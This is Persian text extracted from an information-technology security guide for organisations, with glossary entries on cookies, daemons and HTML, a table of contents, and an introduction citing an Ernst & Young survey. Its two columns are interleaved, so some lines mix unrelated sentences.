‫ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ‬


‫ﻣﺮﺍﺟﻌﻪ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ‪ cookie‬ﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﺪ‬
‫ﻭ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬

‫‪Daemon‬‬

‫ﺑﺮﻧﺎﻣﺔ ﻛﻮﭼﻜﻲ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻫﻤﻴﺸﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ‬


‫ﺍﺳﺖ ﻭ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺍﺯ ﺁﻥ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻱ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻻ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ‬ ‫ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﭼﻨﻴﻦ ﺩﺭﺧﻮﺍﺳﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺷﺒﻜﻪ ﻭ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪HTML‬‬

‫‪ HTML‬ﻳـــﻚ ﻛﻠﻤـــﺔ ﺍﺧﺘـــﺼﺎﺭﻱ ﺑـــﺮﺍﻱ ﻋﺒـــﺎﺭﺕ‬


‫‪ Hyper Text Markup Language‬ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﺯﺑﺎﻥ ﻣﺠﻤﻮﻋﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻳـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﻣﺘﻮﻥ ﻭ ﺗﺼﺎﻭﻳﺮ ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺑﻪ‬
‫ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻨﺪ‪ .‬ﻧﻤﻮﻧـﻪ ﺍﻱ ﺍﺯ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺍﻳـﻦ ﺯﺑـﺎﻥ‬
‫ﭼﻨﻴﻦ ﺍﺳﺖ‪:‬‬
‫‪This sentence is <<Start Bold>> very‬‬
‫‪<<End Bold>> short.‬‬
‫ﺩﺭ ﺟﻤــﻼﺕ ﻓــﻮﻕ ﻛﻠﻤــﺎﺕ ﺩﺍﺧــﻞ ﻋﻼﻣــﺖ >><<‬
‫ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻋﻤﻠﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻧﺘﻴﺠـﺔ‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻓﻮﻕ ﺟﻤﻠﻪﺍﻱ ﺑﻪ ﺷﻜﻞ ﺯﻳﺮ ﺑـﻪ ﻧﻤـﺎﻳﺶ‬
‫ﺩﺭ ﻣﻲﺁﻳﺪ‪:‬‬

‫‪This sentence is very short.‬‬

‫‪174 Universal Resource Locator‬‬


‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﻘﺪﻣﻪ‬ ‫ﻓﺼﻞ ‪.۱‬‬


‫ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ ﳐﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫ﻓﺼﻞ ‪.۲‬‬
‫ﺑﺮﺁﻭﺭﺩ ﳐﺎﻃﺮﻩ ﻭ ﲢﻠﻴﻞ ﺯﻳﺎﻥ‬ ‫ﻓﺼﻞ ‪.۳‬‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﱵ‬ ‫ﻓﺼﻞ ‪.۴‬‬
‫ﭘﻴﺸﮕﲑﻱ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﱐ‬ ‫ﻓﺼﻞ ‪.۵‬‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ‬ ‫ﻓﺼﻞ ‪.۶‬‬
‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ‬ ‫ﻓﺼﻞ ‪.۷‬‬
‫ﺳﻴﺎﺳﺖﻫﺎﻱ ﺣﺮﱘ ﺧﺼﻮﺻﻲ‪ ،‬ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ‪ ،‬ﻭ ﺗﺪﻭﻳﻦ ﺁﺋﲔﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﱵ‬ ‫ﻓﺼﻞ ‪.۸‬‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬ ‫ﻓﺼﻞ ‪.۹‬‬
‫ﻓﺼﻞ ‪ .۱۰‬ﻣﺪﻳﺮﻳﺖ ﳐﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪ :‬ﺧﺪﻣﺎﺕ ﻣﺎﱄ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﳏﻴﻂ ﰊﺳﻴﻢ‬
‫ﻓﺼﻞ ‪ .۱۱‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ :‬ﺍﳚﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ‬
‫ﻓﺼﻞ ‪ .۱۲‬ﻗﻮﺍﻋﺪ ﺍﳝﲏ ﲡﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﳘﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ‬
‫ﻓﺼﻞ ‪ .۱۳‬ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﲔﺍﳌﻠﻠﻲ ﭘﲑﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‬
‫ﺑﻌﻀﻲ ﺷﺎﺧﺼﻬﺎﻱ ﺁﻣﺎﺭﻱ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺗﺤﻘﻴﻖ ﺟﻬﺎﻧﻲ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺍﺭﻧـﺴﺖ ﻭ ﻳﺎﻧـﮓ‪ ٢‬ﺩﺭ ﺳـﺎﻝ‬
‫‪ ۲۰۰۳‬ﻧــﺸﺎﻥ ﻣــﻲﺩﻫــﺪ ﻛــﻪ ‪ %۹۰‬ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﺍﻣﻨﻴــﺖ‬ ‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺁﻧﻬﺎ ﺑﻪ ﺍﻫﺪﺍﻑ ﻛﻠﻲﺷـﺎﻥ ﺑـﺴﻴﺎﺭ ﺣـﺎﺋﺰ‬
‫ﺍﻫﻤﻴــﺖ ﺍﺳــﺖ‪ %۷۸ .‬ﺍﺯ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﻋﻨــﻮﺍﻥ ﻛﺮﺩﻧــﺪ ﻛــﻪ ﺍﻭﻟــﻴﻦ‬ ‫ﻣﻘﺪﻣﻪ‬
‫ﻫﺪﻓـﺸﺎﻥ ﺍﺯ ﺗــﻼﺵ ﺑـﺮﺍﻱ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﻫﺶ‬ ‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﺩﻭﻡ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻣﺨﺎﻃﺮﺍﺕ‪ ٣‬ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺍﻳـﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺷـﺎﻣﻞ ‪ ۱۰۰۰‬ﺷـﺮﻛﺖ‬ ‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ ﺩﺭ ﺁﻥ‬
‫ﺛﺮﻭﺗﻤﻨﺪ ﻣﻲﺷﺪﻧﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ‬ ‫ﻛﺎﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ‪ .‬ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻣﻤﻜـﻦ‬
‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﺗﺤﻘﻴﻖ‪:‬‬ ‫ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳـﺎﺩﻩ ﺑﺎﺷـﺪ ﻭ ﻫـﺮﻛﺲ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺑﻴﺶ ﺍﺯ ‪ %۳۴‬ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻗـﺪﺭﺕ‬ ‫•‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ‬
‫ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻳـﺸﺎﻥ ﺩﺭﺣـﺎﻝ‬ ‫ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻣﺜﻞ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺑـﺎ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ‬
‫ﺣﺎﺿﺮ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ ﺭﺍ ﻧﺪﺍﺭﻧﺪ‪.‬‬ ‫ﺗﺠﺎﺭﻱ‪ ١‬ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﺔ‬
‫ﺷﻬﺮﻭﻧﺪﺍﻥ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻧﻴـﺎﺯ ﺑـﻪ ﺍﻳﺠـﺎﺩ‬
‫ﺑــﻴﺶ ﺍﺯ ‪ %۳۳‬ﺍﻇﻬــﺎﺭ ﻣــﻲﻛﻨﻨــﺪ ﻛــﻪ ﺗﻮﺍﻧــﺎﻳﻲ ﺍﺭﺍﺋــﻪ‬ ‫•‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺭﺳﻤﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮ ﺍﻫﻤﻴﺖ ﭘﻴﺪﺍ ﻣﻲﻛﻨـﺪ‪.‬‬
‫ﻋﻜﺲﺍﻟﻌﻤﻞ ﻣﻨﺎﺳﺐ ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ‬
‫ﻫﻨﮕﺎﻣﻴﻜــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﻣﻮﺿــﻮﻉ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ‬
‫ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ‪ -‬ﭼﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ‪،‬‬
‫ﺗﻨﻬﺎ ‪ %۳۴‬ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺣﺎﺿـﺮ ﺑـﻪ‬ ‫•‬ ‫ﭼﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ‪ ،‬ﻭ ﭼـﻪ ﺩﺭ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻟﺘـﻲ ‪-‬‬
‫ﻲ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻃﺎﻋﺖ ﺍﺯ ﺿﻮﺍﺑﻂ ﺍﻣﻨﻴﺘ ﹺ‬ ‫ﻫﻤﻮﺍﺭﻩ ﺑﺎ ﻣﺴﺎﺋﻞ ﻣﺸﺎﺑﻬﻲ ﻣﻮﺍﺟﻪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﻫﺮ ﮔـﺮﻭﻩ ﺑـﺮﺍﻱ‬
‫‪ %۵۶‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻮﺩﺟﺔ ﻧﺎﻛﺎﻓﻲ ﺭﺍ ﻣﺎﻧﻊ ﺍﺻﻠﻲ ﺗﺄﻣﻴﻦ ﻣـﺆﺛﺮ‬ ‫•‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﻧﻴﺎﺯ ﺑﻪ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺷـﻔﺎﻑ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺩﺍﻧﻨﺪ‪.‬‬ ‫ﻭ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺑﻪﺍﺟﺮﺍ ﺩﺭﺁﻣﺪﻥ ﺗﻮﺳﻂ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﺗﻮﺍﻧـﺎﻳﻲ ﺍﻳﺠـﺎﺩ ﻭ‬
‫ﺣﻔــﻆ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻧﻴﺎﺯﻫــﺎﻱ ﻣــﺸﺘﺮﻳﺎﻥ‪ ،‬ﻭ ﺩﺭﻛــﻲ ﺍﺯ ﭼﮕــﻮﻧﮕﻲ‬
‫ﺣﺪﻭﺩ ‪ %۶۰‬ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﺯﮔـﺸﺖ‬ ‫•‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﻋﻤﻠﻴـﺎﺗﻲ ﺩﺍﺭﺩ‪.‬‬
‫ﺳــﺮﻣﺎﻳﻪ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋــﺎﺗﻲ ﺑﻨــﺪﺭﺕ ﻣﺤﺎﺳــﺒﻪ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻧﻴﺎﺯﻫﺎﻱ ﻛﻠﻲ‪ ،‬ﻫﺮ ﺩﺳﺘﻪ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻣﻼﺣﻈـﺎﺕ‬
‫ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﻫﺮﮔﺰ ﻣﺤﺎﺳﺒﻪ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬
‫ﺧﺎﺹ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻫﺪﺍﻑ ﻭ ﻣﺄﻣﻮﺭﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﻧﺪ‪ .‬ﻣـﺪﻳﺮﺍﻥ‬
‫ﺗﻨﻬــﺎ ‪ %۲۹‬ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺁﻣــﻮﺯﺵ ﻭ ﺁﮔــﺎﻫﻲ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺭﺍ‬ ‫•‬ ‫ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﻛﻪ ﺑﻴﺸﺘﺮﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺗﻮﺟﻪ ﻣﺆﻛﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭﻙ ﻫﺰﻳﻨﻪﻫـﺎﻱ‬
‫ﻞ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺭﻭﻱ ﺁﻥ ﺩﺍﺷﺘﻪﺍﻧﺪ ﺫﻛﺮ ﻣﻲﻛﻨﻨﺪ؛ ﺩﺭ ﻣﻘﺎﺑـ ﹺ‬ ‫ﻲ ﻛﺎﺭﺁ ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ‬
‫‪ %۸۳‬ﻛﻪ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻌﻨﻮﺍﻥ ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ‬ ‫ﺍﺳﺖ‪ .‬ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧـﻮﻋﻲ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺑـﻪ‬
‫ﺧﻮﺩ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻧﺎﻡ ﻣﻲﺑﺮﻧﺪ‪.‬‬ ‫ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ ﻭ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺿﺎﻳﻌﺎﺕ ﻣﺤﺘﻤـﻞ‬
‫ﺗﻨﻬﺎ ‪ %۳۵‬ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ‬ ‫•‬ ‫ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺗﻮﺻﻴﻪﻫﺎﻱ ﻋﻤﻠـﻲ ﺑﺨـﺶ ﺳـﻮﻡ ﺑـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻴﻮﺳﺘﺔ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﺁﻣﻮﺯﺷﻲ ﺩﺍﺭﻧﺪ‪.‬‬ ‫ﺩﺭﻛﻲ ﺍﺯ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ‪ -‬ﻛﻪ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ ﺑـﺎ ﻣﻨـﺎﺑﻊ‬
‫ﻣﺤﺪﻭﺩ ﺑﺴﻴﺎﺭ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ‪ -‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﺁﻣﺎﺭﻫﺎ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳـﻦ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎ ‪ -‬ﭼـﻪ‬
‫ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ ‪ -‬ﻓـﺸﺎﺭﻫﺎﻱ ﻣـﺎﻟﻲ ﻭ ﺭﻭﺍﻧـﻲ ﺗﻬﺪﻳـﺪﻫﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺣﺲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻓﺼﻠﻬﺎﻱ ﺁﺗـﻲ ﺍﻳـﻦ‬

‫‪2‬‬ ‫‪Ernest & Young‬‬


‫‪3‬‬ ‫‪Risks‬‬ ‫‪1‬‬ ‫‪Commercial Transactions‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٢٢‬‬

‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ‬ ‫ﺑﺨﺶ ﺑﻪ ﺍﻭﻟﻮﻳﺘﻬﺎ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ‬


‫ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪ .‬ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻦ ﻧﺘﺎﻳﺞ ﺗﺤﻘﻴﻖ ﺍﺭﻧـﺴﺖ ﻭ‬
‫ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﻪ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭﻱ‬
‫ﻳﺎﻧﮓ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﻧﻤـﺎﺩ ﺍﺯ ﭼﺎﻟـﺸﻬﺎﻳﻲ ﻛـﻪ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﺩﺍﺭﺍﺕ‬
‫ﺭﻭﻱ ﺑﺎﺯﺍﺭ‪ ،‬ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﺟﻮﺍﻣﻊ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﻫﻤﻜـﺎﺭ‪ ،‬ﻭ ﺑﺪﺳـﺖ‬
‫ﺗﺠﺎﺭﻱ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻪ ﺷﺪﻩﺍﻧﺪ ﺑﻨﻈﺮ ﻣﻔﻴﺪ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺁﻭﺭﺩﻥ ﺷﻬﺮﺕ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ‬
‫ﻻ ﺑﺪﻟﻴﻞ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ‬ ‫ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻨﺪ ﻭ ﻣﻌﻤﻮ ﹰ‬ ‫ﺗﺠﺎﺭﺗﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ‬
‫ﺑﻮﺩﺟﻪ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺍﺯ ﻛﻴﻔﻴﺖ ﭘـﺎﻳﻴﻨﺘﺮﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫‪٤‬‬
‫ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺗﺠﺮﺑـﺔ ﻛﻤﺘـﺮﻱ ﻧـﺴﺒﺖ ﺑـﻪ‬ ‫ﺑﺎﺷﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ ﻣﻌﻤـﻮ ﹰ‬ ‫ﺍﮔﺮ ﺷﻤﺎ ﺑﻪ ﺗﺠﺎﺭﺗﻬـﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ ﻣـﺸﻐﻮﻝ ﻫـﺴﺘﻴﺪ‬
‫ﻛﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺩﺍﺭﻧﺪ ﻭ ﻟﺬﺍ ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺧـﺪﻣﺎﺕ ﻣـﺪﺍﻭﻡ ﺑـﻪ‬ ‫ﺍﻭﻟﻮﻳﺘﻬــﺎﻱ ﺍﺻــﻠﻲ ﺷــﻤﺎ ﻗﺎﺑﻠﻴــﺖ ﺳــﻮﺩﺁﻭﺭﻱ‪ ،‬ﺗــﺪﺍﻭﻡ ﺗﺠــﺎﺭﺕ‪،‬‬
